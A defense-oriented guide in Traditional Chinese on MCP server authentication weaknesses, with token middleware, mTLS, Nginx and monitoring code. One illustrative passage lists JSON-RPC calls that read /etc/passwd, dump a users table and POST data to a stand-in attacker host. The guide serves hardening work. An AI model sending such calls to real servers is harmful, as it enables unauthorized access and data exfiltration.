MCP 認證缺口:保護 MCP 伺服器認證
中級15 分鐘閱讀更新於 2026-03-24
聚焦防禦的指南,理解 MCP 伺服器部署中的認證弱點——38% 受掃描伺服器毫無認證——並實作穩健的權杖認證、mTLS 與基於中介層的存取控制。
MCP 規格刻意把認證留給實作者處理,而非列為協定要求。此設計決策原意為降低採用摩擦,卻導致一個安全格局:在 VulnerableMCP 專案掃描的 500 多個可公開存取的 MCP 伺服器中,38% 完全未實作任何認證。
對於可透過 HTTP+SSE 存取的 MCP 伺服器而言,缺乏認證意味著任何能觸及伺服器端點的人都能列舉其工具、呼叫它們並取得結果。對本機執行的 stdio 型伺服器來說,缺乏認證則意味著主機上的任何行程都能連線到伺服器的 stdin/stdout。
理解認證缺口
為什麼 MCP 沒有內建認證
MCP 協定規格(版本 2024-11-05)定義了訊息格式、能力協商與工具呼叫語意,但明確地不定義:
- 客戶端如何向伺服器證明自身身分
- 伺服器如何驗證客戶端有權呼叫特定工具
- 傳輸通道如何防止竊聽或竄改
- 工作階段如何管理或撤銷
MCP 協定層 (JSON-RPC 2.0):
┌────────────────────────────────────────┐
│ initialize / tools/list / tools/call │ ← 協定中無認證欄位
└──────────────┬─────────────────────────┘
│
傳輸層: │ ← 認證必須在此實作
┌──────────────┴─────────────────────────┐
│ stdio (本機) │ HTTP+SSE (網路) │
│ 無認證 │ 認證為「選用」 │
│ 僅行程級 │ 建議使用 TLS 但非必要 │
│ 隔離 │ │
└────────────────────────────────────────┘
這種分層意味著安全性完全取決於伺服器實作者在傳輸層建構了什麼——而大多數 MCP 伺服器樣板與教學都未包含任何認證程式碼。
傳輸類型及其安全屬性
stdio 傳輸:
┌──────────┐ stdin/stdout ┌──────────┐
│ MCP Host │ ◄──────────────► │ MCP │
│(客戶端)│ (pipes) │ Server │
└──────────┘ └──────────┘
安全性:僅行程隔離
認證:無(誰孕生行程就控制它)
威脅:本機權限提升、供應鏈
(惡意套件替換伺服器二進位檔)
HTTP+SSE 傳輸:
┌──────────┐ HTTP POST/SSE ┌──────────┐
│ MCP │ ◄────────────────► │ MCP │
│ 客戶端 │ (網路) │ 伺服器 │
└──────────┘ └──────────┘
安全性:完全取決於實作
認證:規格未要求——必須另外加入
威脅:未授權存取、MITM、工作階段劫持、
憑證竊取、阻斷服務
Streamable HTTP 傳輸 (2025+):
┌──────────┐ HTTP 串流 ┌──────────┐
│ MCP │ ◄────────────────► │ MCP │
│ 客戶端 │ (雙向) │ 伺服器 │
└──────────┘ └──────────┘
安全性:同 HTTP+SSE,但具工作階段管理
認證:建議 OAuth2 但未強制
威脅:同 HTTP+SSE,外加工作階段固定攻擊
未認證存取能做什麼
攻擊者連上未認證的 MCP 伺服器後可以:
- 探索能力:呼叫
tools/list列舉所有可用工具、參數與描述 - 執行工具:以任意參數呼叫
tools/call以呼叫任何已註冊的工具 - 外洩資料:使用檔案讀取、資料庫或 API 工具萃取敏感資訊
- 修改狀態:使用寫入工具變更檔案、資料庫記錄或外部系統
- 進一步跳板:以伺服器對內部服務的存取權作為橫向移動路徑
// 攻擊者只需向未認證的 MCP 伺服器送出 JSON-RPC 請求
// 步驟 1:探索工具
{"jsonrpc": "2.0", "method": "tools/list", "id": 1}
// 步驟 2:讀取敏感檔案
{"jsonrpc": "2.0", "method": "tools/call", "id": 2,
"params": {"name": "read_file", "arguments": {"path": "/etc/passwd"}}}
// 步驟 3:存取內部資料庫
{"jsonrpc": "2.0", "method": "tools/call", "id": 3,
"params": {"name": "query_db", "arguments": {"query": "SELECT * FROM users"}}}
// 步驟 4:透過可用工具外洩
{"jsonrpc": "2.0", "method": "tools/call", "id": 4,
"params": {"name": "http_request", "arguments": {
"url": "https://attacker.com/collect",
"method": "POST",
"body": "stolen_data_here"
}}}為 MCP 伺服器實作基於權杖的認證
最直接的防禦是為 HTTP+SSE MCP 伺服器加上權杖認證。以下是完整實作。
認證中介層
"""
MCP 認證中介層
為 MCP HTTP+SSE 伺服器實作 Bearer 權杖與 API 金鑰認證。
"""
import os
import hmac
import hashlib
import time
import json
import secrets
import logging
from functools import wraps
from dataclasses import dataclass, field
from typing import Optional, Callable
from datetime import datetime, timedelta
logger = logging.getLogger("mcp.auth")
@dataclass
class AuthToken:
"""代表一個已認證 API 權杖。"""
token_id: str
client_name: str
scopes: set[str] # 允許的工具名稱或 "*" 表示全部
created_at: datetime
expires_at: Optional[datetime]
rate_limit: int = 100 # 每分鐘呼叫次數
is_active: bool = True
@dataclass
class AuthResult:
"""認證嘗試的結果。"""
authenticated: bool
token: Optional[AuthToken] = None
error: Optional[str] = None
client_ip: Optional[str] = None
class MCPAuthProvider:
"""
MCP 伺服器的認證提供者。
支援 Bearer 權杖與 HMAC 簽章 API 金鑰。
"""
def __init__(self, token_store_path: str = "/var/mcp/auth/tokens.json"):
self.token_store_path = token_store_path
self.tokens: dict[str, AuthToken] = {}
self._rate_tracker: dict[str, list[float]] = {}
self._load_tokens()
def _load_tokens(self):
"""從加密儲存載入權杖定義。"""
if not os.path.exists(self.token_store_path):
logger.warning("Token store not found at %s", self.token_store_path)
return
with open(self.token_store_path, 'r') as f:
data = json.load(f)
for entry in data.get("tokens", []):
# 僅儲存每個權杖的雜湊值以供比對
token = AuthToken(
token_id=entry["id"],
client_name=entry["client_name"],
scopes=set(entry.get("scopes", ["*"])),
created_at=datetime.fromisoformat(entry["created_at"]),
expires_at=(
datetime.fromisoformat(entry["expires_at"])
if entry.get("expires_at") else None
),
rate_limit=entry.get("rate_limit", 100),
is_active=entry.get("is_active", True),
)
# 鍵是實際權杖值的 SHA-256 雜湊
self.tokens[entry["token_hash"]] = token
def authenticate(self, request_headers: dict,
client_ip: str = "unknown") -> AuthResult:
"""
對進入的 MCP 請求進行認證。
檢查 Authorization 標頭中的 Bearer 權杖或 X-API-Key 標頭。
"""
# 從標頭萃取權杖
auth_header = request_headers.get("Authorization", "")
api_key = request_headers.get("X-API-Key", "")
raw_token = None
if auth_header.startswith("Bearer "):
raw_token = auth_header[7:]
elif api_key:
raw_token = api_key
if not raw_token:
logger.warning(
"Authentication failed: no token provided from %s", client_ip
)
return AuthResult(
authenticated=False,
error="No authentication token provided",
client_ip=client_ip,
)
# 雜湊所提供的權杖並查找
token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
token_record = self.tokens.get(token_hash)
if token_record is None:
logger.warning(
"Authentication failed: invalid token from %s", client_ip
)
return AuthResult(
authenticated=False,
error="Invalid authentication token",
client_ip=client_ip,
)
# 檢查權杖狀態
if not token_record.is_active:
return AuthResult(
authenticated=False,
error="Token has been revoked",
client_ip=client_ip,
)
if (token_record.expires_at and
datetime.utcnow() > token_record.expires_at):
return AuthResult(
authenticated=False,
error="Token has expired",
client_ip=client_ip,
)
# 檢查速率限制
if not self._check_rate_limit(token_record.token_id,
token_record.rate_limit):
return AuthResult(
authenticated=False,
token=token_record,
error="Rate limit exceeded",
client_ip=client_ip,
)
logger.info(
"Authenticated client '%s' (token: %s) from %s",
token_record.client_name, token_record.token_id, client_ip,
)
return AuthResult(
authenticated=True,
token=token_record,
client_ip=client_ip,
)
def authorize_tool_call(self, auth_result: AuthResult,
tool_name: str) -> bool:
"""檢查已認證客戶端是否可呼叫特定工具。"""
if not auth_result.authenticated or auth_result.token is None:
return False
scopes = auth_result.token.scopes
if "*" in scopes:
return True
return tool_name in scopes
def _check_rate_limit(self, token_id: str, limit: int) -> bool:
"""簡單的滑動視窗速率限制器。"""
now = time.time()
window = self._rate_tracker.setdefault(token_id, [])
# 移除 60 秒前的條目
self._rate_tracker[token_id] = [
t for t in window if now - t < 60
]
if len(self._rate_tracker[token_id]) >= limit:
return False
self._rate_tracker[token_id].append(now)
return True
@staticmethod
def generate_token() -> tuple[str, str]:
"""
產生新的 API 權杖。
回傳 (raw_token, token_hash)——僅儲存雜湊。
"""
raw_token = f"mcp_{secrets.token_urlsafe(32)}"
token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
return raw_token, token_hash權杖管理腳本
#!/bin/bash
# mcp-token-manager.sh — 產生並管理 MCP 伺服器認證權杖
# 用法:./mcp-token-manager.sh generate|revoke|list [options]
set -euo pipefail
TOKEN_STORE="/var/mcp/auth/tokens.json"
BACKUP_DIR="/var/mcp/auth/backups"
ensure_store_exists() {
mkdir -p "$(dirname "$TOKEN_STORE")"
mkdir -p "$BACKUP_DIR"
chmod 700 "$(dirname "$TOKEN_STORE")"
if [ ! -f "$TOKEN_STORE" ]; then
echo '{"tokens": []}' > "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
fi
}
generate_token() {
local client_name="${1:?Usage: generate <client_name> [scopes] [expiry_days]}"
local scopes="${2:-*}"
local expiry_days="${3:-90}"
ensure_store_exists
# 產生安全隨機權杖
local raw_token="mcp_$(openssl rand -base64 32 | tr -d '/+=' | head -c 43)"
local token_hash
token_hash=$(echo -n "$raw_token" | sha256sum | awk '{print $1}')
local token_id
token_id=$(openssl rand -hex 8)
local created_at
created_at=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
local expires_at
expires_at=$(date -u -d "+${expiry_days} days" +"%Y-%m-%dT%H:%M:%SZ")
# 備份目前儲存
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
# 將權杖加入儲存(僅儲存雜湊)
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
--arg name "$client_name" \
--arg hash "$token_hash" \
--arg scopes "$scopes" \
--arg created "$created_at" \
--arg expires "$expires_at" \
'.tokens += [{
"id": $id,
"client_name": $name,
"token_hash": $hash,
"scopes": ($scopes | split(",")),
"created_at": $created,
"expires_at": $expires,
"rate_limit": 100,
"is_active": true
}]' "$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "============================================"
echo " MCP 權杖產生成功"
echo "============================================"
echo " 權杖 ID: $token_id"
echo " 客戶端: $client_name"
echo " 範圍: $scopes"
echo " 到期: $expires_at"
echo ""
echo " 原始權杖(請保存——無法恢復):"
echo " $raw_token"
echo "============================================"
}
revoke_token() {
local token_id="${1:?Usage: revoke <token_id>}"
ensure_store_exists
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
'(.tokens[] | select(.id == $id)).is_active = false' \
"$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "權杖 $token_id 已撤銷。"
}
list_tokens() {
ensure_store_exists
echo "現行 MCP 權杖:"
echo "-------------------"
jq -r '.tokens[] | select(.is_active == true) |
"ID: \(.id) Client: \(.client_name) Scopes: \(.scopes | join(",")) Expires: \(.expires_at)"' \
"$TOKEN_STORE"
}
case "${1:-help}" in
generate) generate_token "${@:2}" ;;
revoke) revoke_token "${@:2}" ;;
list) list_tokens ;;
*) echo "Usage: $0 generate|revoke|list [options]" ;;
esac將認證中介層整合到 MCP 伺服器
"""
範例:使用 Python SDK 建置帶認證中介層的 MCP 伺服器。
"""
from mcp.server import Server
from mcp.server.sse import SseServerTransport
from starlette.applications import Starlette
from starlette.routing import Route, Mount
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.middleware import Middleware
from starlette.middleware.base import BaseHTTPMiddleware
import uvicorn
from mcp_auth import MCPAuthProvider
class MCPAuthMiddleware(BaseHTTPMiddleware):
"""強制 MCP 認證的 Starlette 中介層。"""
# 不需認證的路徑
PUBLIC_PATHS = {"/health", "/ready"}
def __init__(self, app, auth_provider: MCPAuthProvider):
super().__init__(app)
self.auth = auth_provider
async def dispatch(self, request: Request, call_next):
# 健康檢查跳過認證
if request.url.path in self.PUBLIC_PATHS:
return await call_next(request)
# 認證請求
client_ip = request.client.host if request.client else "unknown"
auth_result = self.auth.authenticate(
dict(request.headers), client_ip
)
if not auth_result.authenticated:
return JSONResponse(
{"jsonrpc": "2.0", "error": {
"code": -32001,
"message": auth_result.error
}},
status_code=401,
headers={"WWW-Authenticate": "Bearer"},
)
# 將認證上下文附加到請求狀態,供工具層授權使用
request.state.auth = auth_result
return await call_next(request)
# 建立 MCP 伺服器
server = Server("secure-mcp-server")
auth_provider = MCPAuthProvider("/var/mcp/auth/tokens.json")
# 定義工具並檢查授權
@server.list_tools()
async def list_tools():
return [
{
"name": "read_file",
"description": "Read a file from the workspace",
"inputSchema": {
"type": "object",
"properties": {"path": {"type": "string"}},
"required": ["path"],
},
},
{
"name": "query_database",
"description": "Run a read-only database query",
"inputSchema": {
"type": "object",
"properties": {"query": {"type": "string"}},
"required": ["query"],
},
},
]
@server.call_tool()
async def call_tool(name: str, arguments: dict):
# 工具層的授權會在此使用 request.state.auth 檢查
# 此為簡化範例
if name == "read_file":
path = arguments["path"]
# ... 已驗證的檔案讀取邏輯 ...
return [{"type": "text", "text": f"Contents of {path}"}]
elif name == "query_database":
query = arguments["query"]
# ... 已驗證的查詢邏輯 ...
return [{"type": "text", "text": f"Query results for: {query}"}]
# 以認證中介層串接 Starlette app
sse = SseServerTransport("/messages/")
async def handle_sse(request: Request):
async with sse.connect_sse(
request.scope, request.receive, request._send
) as streams:
await server.run(
streams[0], streams[1], server.create_initialization_options()
)
app = Starlette(
routes=[
Route("/sse", endpoint=handle_sse),
Mount("/messages/", app=sse.handle_post_message),
],
middleware=[
Middleware(MCPAuthMiddleware, auth_provider=auth_provider),
],
)
if __name__ == "__main__":
uvicorn.run(app, host="127.0.0.1", port=8443, ssl_certfile="/var/mcp/certs/server.crt",
ssl_keyfile="/var/mcp/certs/server.key")為高安全性部署設定 mTLS
對於處理敏感資料或受監管產業的環境,雙向 TLS 可提供強式密碼學認證,客戶端與伺服器皆出示憑證。
設立憑證頒發機構
#!/bin/bash
# setup-mcp-ca.sh — 為 MCP mTLS 認證建立私有 CA
set -euo pipefail
CA_DIR="/var/mcp/ca"
CERT_DAYS=365
CA_DAYS=3650
mkdir -p "${CA_DIR}"/{certs,private,crl,newcerts}
chmod 700 "${CA_DIR}/private"
touch "${CA_DIR}/index.txt"
echo 1000 > "${CA_DIR}/serial"
echo "[*] 產生 CA 私鑰..."
openssl genrsa -aes256 -out "${CA_DIR}/private/ca.key" 4096
chmod 400 "${CA_DIR}/private/ca.key"
echo "[*] 建立 CA 憑證..."
openssl req -new -x509 -days ${CA_DAYS} \
-key "${CA_DIR}/private/ca.key" \
-out "${CA_DIR}/certs/ca.crt" \
-subj "/C=US/ST=Security/O=MCP Security/CN=MCP Internal CA" \
-addext "basicConstraints=critical,CA:TRUE,pathlen:0" \
-addext "keyUsage=critical,keyCertSign,cRLSign"
echo "[*] 產生 MCP 伺服器憑證..."
openssl genrsa -out "${CA_DIR}/private/mcp-server.key" 2048
chmod 400 "${CA_DIR}/private/mcp-server.key"
openssl req -new \
-key "${CA_DIR}/private/mcp-server.key" \
-out "${CA_DIR}/certs/mcp-server.csr" \
-subj "/C=US/ST=Security/O=MCP Security/CN=mcp-server"
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/mcp-server.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/mcp-server.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName = DNS:mcp-server,DNS:mcp-server.internal,IP:127.0.0.1
EXTEOF
)
echo "[+] CA 與伺服器憑證已建立。"
echo " CA 憑證: ${CA_DIR}/certs/ca.crt"
echo " 伺服器憑證: ${CA_DIR}/certs/mcp-server.crt"
echo " 伺服器金鑰: ${CA_DIR}/private/mcp-server.key"#!/bin/bash
# generate-mcp-client-cert.sh — 為 MCP mTLS 產生客戶端憑證
# 用法:./generate-mcp-client-cert.sh <client_name>
set -euo pipefail
CA_DIR="/var/mcp/ca"
CLIENT_NAME="${1:?Usage: generate-mcp-client-cert.sh <client_name>}"
CERT_DAYS=90
echo "[*] 為 '${CLIENT_NAME}' 產生客戶端金鑰..."
openssl genrsa -out "${CA_DIR}/private/${CLIENT_NAME}.key" 2048
chmod 400 "${CA_DIR}/private/${CLIENT_NAME}.key"
echo "[*] 建立 CSR..."
openssl req -new \
-key "${CA_DIR}/private/${CLIENT_NAME}.key" \
-out "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-subj "/C=US/ST=Security/O=MCP Security/CN=${CLIENT_NAME}"
echo "[*] 以 CA 簽署..."
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/${CLIENT_NAME}.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature
extendedKeyUsage = clientAuth
EXTEOF
)
echo "[+] '${CLIENT_NAME}' 的客戶端憑證已建立。"
echo " 憑證:${CA_DIR}/certs/${CLIENT_NAME}.crt"
echo " 金鑰:${CA_DIR}/private/${CLIENT_NAME}.key"
echo " ${CERT_DAYS} 天後到期"
echo ""
echo " 搭配 curl 使用:"
echo " curl --cert ${CA_DIR}/certs/${CLIENT_NAME}.crt \\"
echo " --key ${CA_DIR}/private/${CLIENT_NAME}.key \\"
echo " --cacert ${CA_DIR}/certs/ca.crt \\"
echo " https://mcp-server:8443/sse"啟用 mTLS 的 MCP 伺服器設定
"""
具 mTLS 認證的 MCP 伺服器。
從 TLS 憑證萃取客戶端身分。
"""
import ssl
import logging
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.routing import Route
import uvicorn
logger = logging.getLogger("mcp.mtls")
# 客戶端憑證 CN -> 允許的工具範圍
CLIENT_PERMISSIONS = {
"agent-production": {"*"}, # 完整存取
"agent-staging": {"read_file", "list_files"}, # 唯讀
"monitoring": {"health_check", "get_metrics"}, # 僅監控
}
def create_ssl_context() -> ssl.SSLContext:
"""建立具 mTLS 設定的 SSL 上下文。"""
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# 伺服器憑證與金鑰
ctx.load_cert_chain(
certfile="/var/mcp/ca/certs/mcp-server.crt",
keyfile="/var/mcp/ca/private/mcp-server.key",
)
# 要求由我方 CA 簽署的客戶端憑證
ctx.load_verify_locations(cafile="/var/mcp/ca/certs/ca.crt")
ctx.verify_mode = ssl.CERT_REQUIRED
# 強健 TLS 設定
ctx.minimum_version = ssl.TLSVersion.TLSv1_3
ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM")
# 載入已撤銷憑證的 CRL
ctx.load_verify_locations(cafile="/var/mcp/ca/crl/revoked.pem")
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
return ctx
async def extract_client_identity(request: Request) -> dict:
"""從 mTLS 憑證萃取客戶端身分。"""
# 從傳輸取得對端憑證
transport = request.scope.get("transport")
if not transport:
return {"authenticated": False, "error": "No transport"}
peercert = transport.get_extra_info("peercert")
if not peercert:
return {"authenticated": False, "error": "No client certificate"}
# 萃取 Common Name
subject = dict(x[0] for x in peercert.get("subject", ()))
client_cn = subject.get("commonName", "unknown")
# 查找權限
scopes = CLIENT_PERMISSIONS.get(client_cn)
if scopes is None:
logger.warning("Unknown client CN: %s", client_cn)
return {
"authenticated": True,
"authorized": False,
"client_cn": client_cn,
"error": "Client not in permissions table",
}
return {
"authenticated": True,
"authorized": True,
"client_cn": client_cn,
"scopes": scopes,
}
async def handle_tool_call(request: Request):
"""以基於 mTLS 的授權處理 MCP 工具呼叫。"""
identity = await extract_client_identity(request)
if not identity.get("authenticated"):
return JSONResponse({"error": "mTLS authentication failed"}, status_code=401)
if not identity.get("authorized"):
return JSONResponse({"error": "Client not authorized"}, status_code=403)
# 解析 JSON-RPC 請求
body = await request.json()
tool_name = body.get("params", {}).get("name", "")
# 檢查工具層授權
if "*" not in identity["scopes"] and tool_name not in identity["scopes"]:
logger.warning(
"Client %s attempted unauthorized tool call: %s",
identity["client_cn"], tool_name,
)
return JSONResponse({
"jsonrpc": "2.0",
"error": {"code": -32003, "message": f"Not authorized for tool: {tool_name}"},
"id": body.get("id"),
}, status_code=403)
# 處理已授權的工具呼叫
logger.info("Authorized %s -> %s", identity["client_cn"], tool_name)
# ... 工具執行邏輯 ...
return JSONResponse({"jsonrpc": "2.0", "result": {"status": "ok"}, "id": body.get("id")})
app = Starlette(routes=[Route("/mcp", handle_tool_call, methods=["POST"])])
if __name__ == "__main__":
uvicorn.run(
app,
host="0.0.0.0",
port=8443,
ssl=create_ssl_context(),
)Nginx 反向代理與認證
對生產環境部署,可在 MCP 伺服器前放置 Nginx 反向代理:
# /etc/nginx/conf.d/mcp-server.conf
# 具認證的 MCP 伺服器 Nginx 反向代理
upstream mcp_backend {
server 127.0.0.1:8080;
keepalive 32;
}
# 速率限制區域
limit_req_zone $binary_remote_addr zone=mcp_init:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=mcp_tools:10m rate=30r/m;
limit_conn_zone $binary_remote_addr zone=mcp_conn:10m;
server {
listen 443 ssl http2;
server_name mcp.internal.example.com;
# TLS 設定
ssl_certificate /var/mcp/ca/certs/mcp-server.crt;
ssl_certificate_key /var/mcp/ca/private/mcp-server.key;
ssl_protocols TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# mTLS — 要求客戶端憑證
ssl_client_certificate /var/mcp/ca/certs/ca.crt;
ssl_verify_client on;
ssl_verify_depth 2;
ssl_crl /var/mcp/ca/crl/revoked.pem;
# 連線上限
limit_conn mcp_conn 10;
# 安全標頭
add_header X-Content-Type-Options nosniff always;
add_header X-Frame-Options DENY always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
# 健康檢查(不需認證)
location /health {
proxy_pass http://mcp_backend/health;
access_log off;
}
# SSE 端點(初始化)
location /sse {
limit_req zone=mcp_init burst=3 nodelay;
# 將客戶端憑證資訊傳給後端
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_set_header X-Client-Fingerprint $ssl_client_fingerprint;
# SSE 特定代理設定
proxy_pass http://mcp_backend/sse;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_buffering off;
proxy_cache off;
proxy_read_timeout 3600s;
proxy_send_timeout 3600s;
}
# 工具呼叫端點
location /messages/ {
limit_req zone=mcp_tools burst=10 nodelay;
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_pass http://mcp_backend/messages/;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
# 請求主體大小限制
client_max_body_size 1m;
}
# 其餘一律封鎖
location / {
return 404;
}
# 帶客戶端身分的存取日誌
access_log /var/log/nginx/mcp-access.log combined;
error_log /var/log/nginx/mcp-error.log warn;
}
# 將 HTTP 轉址至 HTTPS
server {
listen 80;
server_name mcp.internal.example.com;
return 301 https://$server_name$request_uri;
}認證監控與告警
"""
MCP 認證監控——偵測認證異常。
"""
import json
import logging
from datetime import datetime, timedelta
from collections import defaultdict
from dataclasses import dataclass, field
logger = logging.getLogger("mcp.auth.monitor")
@dataclass
class AuthEvent:
timestamp: datetime
client_ip: str
client_cn: str
event_type: str # success, failure, revoked, expired, rate_limited
tool_name: str = ""
details: str = ""
class AuthMonitor:
"""監控認證事件以偵測異常。"""
def __init__(self, alert_callback=None):
self.events: list[AuthEvent] = []
self.failure_counts: dict[str, int] = defaultdict(int)
self.alert_callback = alert_callback or self._default_alert
self._alert_thresholds = {
"brute_force": 10, # 每個 IP 每小時失敗次數
"credential_stuffing": 5, # 每個 IP 每小時獨特無效權杖數
"unusual_scope": 3, # 未授權工具存取嘗試
}
def record_event(self, event: AuthEvent):
"""記錄並分析認證事件。"""
self.events.append(event)
if event.event_type == "failure":
self.failure_counts[event.client_ip] += 1
self._check_brute_force(event)
if event.event_type == "unauthorized_tool":
self._check_scope_abuse(event)
# 清除舊事件(保留 24 小時)
cutoff = datetime.utcnow() - timedelta(hours=24)
self.events = [e for e in self.events if e.timestamp > cutoff]
def _check_brute_force(self, event: AuthEvent):
"""偵測暴力破解認證嘗試。"""
cutoff = datetime.utcnow() - timedelta(hours=1)
recent_failures = sum(
1 for e in self.events
if e.client_ip == event.client_ip
and e.event_type == "failure"
and e.timestamp > cutoff
)
if recent_failures >= self._alert_thresholds["brute_force"]:
self.alert_callback({
"alert_type": "brute_force_detected",
"severity": "high",
"client_ip": event.client_ip,
"failure_count": recent_failures,
"window": "1 hour",
"recommendation": f"Block IP {event.client_ip} and investigate",
})
def _check_scope_abuse(self, event: AuthEvent):
"""偵測試圖存取未授權工具的客戶端。"""
cutoff = datetime.utcnow() - timedelta(hours=1)
scope_violations = sum(
1 for e in self.events
if e.client_cn == event.client_cn
and e.event_type == "unauthorized_tool"
and e.timestamp > cutoff
)
if scope_violations >= self._alert_thresholds["unusual_scope"]:
self.alert_callback({
"alert_type": "scope_abuse_detected",
"severity": "high",
"client_cn": event.client_cn,
"violation_count": scope_violations,
"last_tool": event.tool_name,
"recommendation": (
f"Review permissions for {event.client_cn} "
f"and check for compromised credentials"
),
})
def _default_alert(self, alert: dict):
logger.critical(json.dumps({
"event": "mcp_auth_alert",
**alert,
"timestamp": datetime.utcnow().isoformat(),
}))
def get_dashboard_stats(self) -> dict:
"""回傳安全儀表板統計資料。"""
cutoff_1h = datetime.utcnow() - timedelta(hours=1)
cutoff_24h = datetime.utcnow() - timedelta(hours=24)
events_1h = [e for e in self.events if e.timestamp > cutoff_1h]
events_24h = [e for e in self.events if e.timestamp > cutoff_24h]
return {
"last_hour": {
"total": len(events_1h),
"successes": sum(1 for e in events_1h if e.event_type == "success"),
"failures": sum(1 for e in events_1h if e.event_type == "failure"),
"unique_ips": len(set(e.client_ip for e in events_1h)),
},
"last_24h": {
"total": len(events_24h),
"successes": sum(1 for e in events_24h if e.event_type == "success"),
"failures": sum(1 for e in events_24h if e.event_type == "failure"),
"unique_ips": len(set(e.client_ip for e in events_24h)),
"unique_clients": len(set(
e.client_cn for e in events_24h if e.event_type == "success"
)),
},
}保護 stdio 型 MCP 伺服器
stdio 伺服器不使用網路認證,但仍需存取控制:
"""
stdio 型 MCP 伺服器的安全控制。
由於 stdio 使用行程層級存取,控制聚焦於:
- 驗證父行程身分
- 限制孕生行程可存取哪些工具
- 記錄所有操作以供稽核
"""
import os
import json
import logging
from pathlib import Path
logger = logging.getLogger("mcp.stdio.security")
def verify_parent_process() -> dict:
"""
驗證孕生此 MCP 伺服器的行程身分。
回傳父行程資訊以供授權決策。
"""
ppid = os.getppid()
parent_info = {}
try:
# 讀取父行程命令列
cmdline_path = f"/proc/{ppid}/cmdline"
with open(cmdline_path, 'rb') as f:
cmdline = f.read().decode('utf-8', errors='replace').split('\x00')
parent_info["cmdline"] = cmdline
# 讀取父行程執行檔
exe_path = os.readlink(f"/proc/{ppid}/exe")
parent_info["executable"] = exe_path
# 讀取父行程使用者
stat_path = f"/proc/{ppid}/status"
with open(stat_path, 'r') as f:
for line in f:
if line.startswith("Uid:"):
uids = line.split()[1:]
parent_info["uid"] = int(uids[0])
elif line.startswith("Gid:"):
gids = line.split()[1:]
parent_info["gid"] = int(gids[0])
except (FileNotFoundError, PermissionError) as e:
logger.error("Cannot verify parent process %d: %s", ppid, e)
parent_info["error"] = str(e)
return parent_info
# 允許孕生此 MCP 伺服器的執行檔清單
ALLOWED_PARENTS = {
"/usr/bin/claude",
"/usr/local/bin/cursor",
"/usr/bin/code",
"/opt/mcp-host/bin/mcp-host",
}
def enforce_parent_allowlist():
"""若父行程不在允許清單中則拒絕啟動。"""
parent = verify_parent_process()
exe = parent.get("executable", "unknown")
if exe not in ALLOWED_PARENTS:
logger.critical(
"MCP server started by unauthorized parent: %s (PID %d)",
exe, os.getppid()
)
raise SystemExit(
f"Unauthorized parent process: {exe}. "
f"Allowed: {ALLOWED_PARENTS}"
)
logger.info("Parent process verified: %s (PID %d)", exe, os.getppid())參考資料
- VulnerableMCP 專案:對 500+ 公開 MCP 伺服器的系統性掃描,發現 38% 無認證
- eSentire CISO Advisory:「Securing MCP Deployments」——企業級 MCP 認證指引
- MCP 規格:Model Context Protocol——傳輸與工作階段管理章節
- OWASP ASI:代理式安全倡議——認證與存取控制要求
- Pomerium:「Zero Trust for MCP」——MCP 伺服器的代理式認證
- RFC 8705:OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens